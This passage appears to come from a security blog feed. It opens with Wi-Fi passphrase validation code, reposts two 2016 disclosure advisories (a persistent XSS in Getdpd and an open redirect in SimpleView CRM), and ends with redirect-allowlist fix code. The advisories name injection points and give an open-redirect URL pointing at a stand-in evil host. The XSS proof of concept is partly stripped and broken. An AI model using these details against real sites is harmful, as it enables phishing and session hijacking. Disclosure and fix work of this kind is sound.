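function passphraseProblems(psk) {
  if (typeof psk !== "string") return ["missing"];
  const problems = [];
  if (psk.length < 8 || psk.length > 63) problems.push("length must be 8..63");
  if (!/^[\x20-\x7e]*$/.test(psk)) problems.push("non-printable or non-ASCII character");
  if (!/[a-z]/.test(psk)) problems.push("no lowercase letter");
  if (!/[A-Z]/.test(psk)) problems.push("no uppercase letter");
  if (!/[^A-Za-z0-9]/.test(psk)) problems.push("no special character");
  return problems;
}

// Validate the raw POST body on the server, whatever the client-side script did.
function validateWifiSettingsBody(rawBody) {
  const params = new URLSearchParams(rawBody);
  const errors = {};
  for (const field of PSK_FIELDS) {
    const values = params.getAll(field);
    if (values.length === 0) continue; // this band's passphrase is not being changed
    if (values.length > 1) {
      // Which duplicate a backend would read is ambiguous, so refuse the request.
      errors[field] = ["parameter sent more than once"];
      continue;
    }
    const problems = passphraseProblems(values[0]);
    if (problems.length > 0) errors[field] = problems;
  }
  return { ok: Object.keys(errors).length === 0, errors };
}

// Constructed sample bodies (not captured from a device).
const SAMPLE_BODIES = [
  "wlPSkey2g=Tr%21cky-Pass9&wlPSkey5g=Tr%21cky-Pass9", // meets the policy
  "wlPSkey2g=password&wlPSkey5g=Tr%21cky-Pass9",       // weak 2.4 GHz key, replayed past the UI
];

function runSamples() {
  return SAMPLE_BODIES.map((body) => validateWifiSettingsBody(body));
}

console.log(JSON.stringify(runSamples(), null, 2));
```

A handler that applies the change only when `ok` is true gives the same result whether the request comes from the settings page or from a replayed POST.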

Source: Gmail -> IFTTT-> Blogger

[FD] Getdpd Bug Bounty #1 - (asm0option0) Persistent Web Vulnerability

Document Title:
===============
Getdpd Bug Bounty #1 - (asm0option0) Persistent Web Vulnerability

References (Source):
====================
http://ift.tt/1aXDAZq

ID: #14770

Release Date:
=============
2016-02-02

Vulnerability Laboratory ID (VL-ID):
====================================
1564

Common Vulnerability Scoring System:
====================================
3.6

Product & Service Introduction:
===============================
DPD is an all-in-one shopping cart and digital fulfillment service for downloadable products. Serving thousands of stores, DPD processes and delivers millions worth of downloads each year.

(Copy of the Vendor Homepage: http://ift.tt/1PzrDdV )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered an application-side input validation web vulnerability in the official Getdpd online service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-08-06: Researcher Notification & Coordination (Hadji Samir - Evolution Security GmbH)
2015-08-07: Vendor Notification (DPD Security Team - Bug Bounty Program)
2015-09-02: Vendor Response/Feedback (DPD Security Team - Bug Bounty Program)
2016-01-07: Vendor Fix/Patch (DPD Developer Team)
2016-02-02: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
DPD - Digital Product Delivery
Product: DPD Online Service (Web-Application) 2015 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side cross site scripting web vulnerability has been discovered in the official Getdpd online service web-application. The security vulnerability allows remote attackers to inject own script code to the application-side of the affected application module.

The vulnerability is located in the input value id asm0option0 of the Button/Link creator module. Remote attackers with low privilege web-application user accounts are able to inject own malicious script code via POST method request. The injection point is the vulnerable id parameter with the title input and the execution point is located in the storefront/productchooser?method=cart module. The request method to inject is POST and the vulnerability is located on the application-side of the vulnerable service.

The security risk of the application-side cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the persistent input validation web vulnerability requires a low privilege web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Service(s):
[+] getdpd.com

Vulnerable Module(s):
[+] Button/Link creator

Vulnerable Parameter(s):
[+] storefront/productchooser?method=cart (asm0option0)

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Create new product with payload code (injection code)
2. Click to create Button/link creator (http://ift.tt/1P61r9j)
3. Click Product Chooser (http://ift.tt/1PzrEhW)
4. Product Chooser
5. The payload code will execute!

PoC: Source
Product Chooser
Add products to your chooser using the pulldown on the left. Once added to the display below, sort them as you like by dragging and dropping. Click on a button to use it. Click on it again to remove it. When you don't use a button, selecting from your chooser will automatically send you to the cart (or buy now). Once you have it the way you like, copy the code and paste it on your site.
Added: ``>
  1. ``>
Generated Code:

[FD] SimpleView CRM - Client Side Open Redirect Vulnerability

Document Title:
===============
SimpleView CRM - Client Side Open Redirect Vulnerability

References (Source):
====================
http://ift.tt/1SB8mcW

Release Date:
=============
2016-02-02

Vulnerability Laboratory ID (VL-ID):
====================================
1668

Common Vulnerability Scoring System:
====================================
2.8

Product & Service Introduction:
===============================
Customer Relationship Management only scratches the surface of our web-based destination management system. Combining meeting sales, industry partner management, consumer marketing, forecasting, business analysis, reporting, and more, Simpleview CRM is the most widely used tool in destination marketing.

(Copy of the Vendor Homepage: http://ift.tt/1R7YW6O )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a client-side redirect web vulnerability in the official SimpleView CRM web-application.

Vulnerability Disclosure Timeline:
==================================
2016-01-17: Researcher Notification & Coordination (Tommy DeVoss)
2016-01-18: Vendor Notification (SimpleView CRM Security Team)
2016-02-02: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
SimpleView
Product: CRM - Application 2016 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Low

Technical Details & Description:
================================
An open redirect web vulnerability has been discovered in the official SimpleView CRM web-application. The bug allows remote attackers to execute external urls by the internal web-application requests via client-side.

The vulnerability is located in the `redirect` parameter of the vulnerable `./crm/track/` module. The vulnerability allows a remote attacker to prepare client-side malicious urls to external sources. The request method to execute is GET and the vulnerability is located on the application-side of the online-service. The vulnerability is a classic open redirect web vulnerability.

The security risk of the open redirect web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the persistent input validation web vulnerability requires no privileged user account and low or medium user interaction. Successful exploitation of the vulnerability results in client-side redirects to malicious sources or client-side phishing.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./crm/track/

Vulnerable Parameter(s):
[+] redirect

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Vulnerability: Open redirect in the following module:
/plugins/crm/track/?key=4_314&redirect=http://EVILURLHERE.com

PoC:
www.example.com/plugins/crm/track/?key=4_314&redirect=http://test.de/

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the `redirect/key` parameter in the `plugins` module of the software. Disallow requests to non-whitelisted webpages in the `redirect` value and include a tag filter to prevent as well.

Security Risk:
==============
The security risk of the client-side open redirect web vulnerability in the simpleview crm web-application is estimated as low. (CVSS 2.8)

Credits & Authors:
==================
Tommy DeVoss

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.
Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
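
The allowlist restriction that the SimpleView advisory recommends for the `redirect` parameter can be written as a single server-side check. This is an added example, not code from the advisory or from SimpleView: the host allowlist, the fallback path and the function names are assumptions, and only the `/plugins/crm/track/` path, the `key` and `redirect` parameters and the `http://test.de/` value come from the advisory.

```javascript
// Added example: allowlist validation for the tracker's `redirect` parameter.
// Hosts, fallback and function names are hypothetical.
const ALLOWED_REDIRECT_HOSTS = new Set(["www.example.com", "partners.example.com"]);
const FALLBACK_LOCATION = "/";

// Returns the URL to redirect to, or the fallback when the value is not allowed.
function safeRedirectTarget(value) {
  if (typeof value !== "string" || value === "") return FALLBACK_LOCATION;
  // Control characters and backslashes are normalised differently by browsers
  // and servers, so refuse them rather than guess.
  if (/[\u0000-\u001f\u007f\\]/.test(value)) return FALLBACK_LOCATION;
  let url;
  try {
    // No base URL is supplied: relative and scheme-relative values throw here.
    url = new URL(value);
  } catch {
    return FALLBACK_LOCATION;
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return FALLBACK_LOCATION;
  // Credentials in front of the host make the real destination hard to read.
  if (url.username !== "" || url.password !== "") return FALLBACK_LOCATION;
  // Exact match on the parsed hostname, never a substring or suffix test.
  if (!ALLOWED_REDIRECT_HOSTS.has(url.hostname)) return FALLBACK_LOCATION;
  return url.href;
}

// Minimal stand-in for the tracking endpoint: parse the query, validate, redirect.
function handleTrackRequest(requestUrl) {
  const params = new URL(requestUrl, "http://localhost").searchParams;
  return { status: 302, location: safeRedirectTarget(params.get("redirect")) };
}

// Constructed sample requests; the second carries the value from the advisory's PoC.
const SAMPLE_REQUESTS = [
  "/plugins/crm/track/?key=4_314&redirect=https%3A%2F%2Fpartners.example.com%2Foffers",
  "/plugins/crm/track/?key=4_314&redirect=http://test.de/",
  "/plugins/crm/track/?key=4_314&redirect=https%3A%2F%2Fwww.example.com.test.de%2F",
];

function runSamples() {
  return SAMPLE_REQUESTS.map((req) => handleTrackRequest(req).location);
}

console.log(runSamples());
```

Only the first sample keeps its destination; the other two fall back to `/` because the parsed hostname is not on the list.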

Source: Gmail -> IFTTT-> Blogger